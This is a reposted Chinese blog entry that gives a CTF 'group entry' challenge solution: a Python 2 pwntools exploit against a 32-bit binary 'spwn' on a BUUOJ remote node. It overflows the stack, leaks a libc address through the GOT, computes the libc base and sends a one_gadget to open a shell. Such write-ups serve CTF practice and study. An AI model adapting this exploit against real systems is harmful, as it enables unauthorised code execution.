某入群题

不好讲就是入群题
exp（Python 2 + pwntools 利用脚本；libc 偏移按本地 elf.libc 计算，远程 libc 版本不同时需要重新调整 -247 与 one_gadget 偏移）：

#! /usr/bin/python2
from pwn import *
from LibcSearcher import *
# Target selection: local == 1 spawns the binary under pwntools, anything else
# connects to the remote CTF instance. In both cases the libc used for every
# offset below is whatever pwntools resolves for the *local* binary (elf.libc);
# the hard-coded adjustments in exp() are only valid for that libc build.
local = 0
if local == 1:
	p = process('../binary/spwn')
else:
	p = remote('node3.buuoj.cn', 29494)
elf = ELF('../binary/spwn')
libc = elf.libc


def lg(address, data):
	"""Log `data` as hex behind the label `address` (e.g. 'libcbase: ')."""
	return log.success('%s' % address + hex(data))
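def exp():
	"""Drive the exploit over the module-level tube `p`.

	Uses the globals `p`, `elf`, `libc` and `lg` set up at import time.
	Stages, as written in the payloads (exact stack layout is inferred from
	the offsets and should be confirmed against the binary):
	1. answer the first prompt with 4 filler bytes;
	2. two overflow writes whose last dword is the address of `main`,
	   presumably to return into `main` for another round;
	3. a third write that hands the GOT slot of `__libc_start_main` to the
	   routine at 0x080484BC so the program prints a libc address; the leak
	   is decoded, adjusted and used to compute the libc base;
	4. send the final `/bin/sh` + one_gadget pair and go interactive.

	The constants (-247 adjustment, one_gadget offset 0x3a80c, the 0xf7 byte
	used to find the leak) are tied to the libc that `elf.libc` resolved to;
	a different libc on the remote side makes the base computation wrong.

	The unused `ret` and `system` values of the original were dropped.
	"""
	main = 0x08048513

	# 1) first prompt: filler answer.
	p.recvuntil('?')
	p.send('a' * 4)

	# 2) first overflow, ending with main's address.
	p.recvuntil('say?')
	payload1 = 'a' * 0x10 + p32(1) + '2' * 4 + p32(20) + p32(main)
	p.send(payload1)
	p.recvuntil('name?')
	p.send('bbbb' + p32(0) + p32(main))

	# 3) leak: GOT entry of __libc_start_main as the argument of the routine
	#    at 0x080484BC (presumably an output function), 0x804A300 alongside.
	p.recvuntil('say?')
	payload2 = 'b' * 0x10 + p32(elf.got['__libc_start_main']) + '2' * 4
	payload2 += p32(0x804A300) + p32(0x080484BC)
	p.send(payload2)
	# The leaked dword is located by its top byte 0xf7 (i386 libc mapping);
	# this assumes no earlier 0xf7 byte appears in the output.
	# NOTE(review): the -247 adjustment treats the leaked value as
	# __libc_start_main+247 (a glibc-2.23-style return address) rather than
	# the raw GOT value — confirm which one the binary actually prints.
	leak = u32(p.recvuntil('\xf7')[-4:])
	libc_start_main = leak - 247
	libcbase = libc_start_main - libc.sym['__libc_start_main']
	lg('libcbase: ', libcbase)
	# next() works on both Python 2 and 3, unlike the .next() method.
	bin_sh = libcbase + next(libc.search('/bin/sh'))
	one_gadget = libcbase + 0x3a80c  # libc-build specific offset

	# 4) final chain, one more prompt answer, then the shell.
	p.send(p32(bin_sh) + p32(one_gadget))
	p.recvuntil('say?')
	p.send('aa')
	p.interactive()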

if __name__ == "__main__":
	# Entry point: only fire the exploit when run as a script, not on import.
	exp()

转载自blog.csdn.net/qq_37433000/article/details/104105762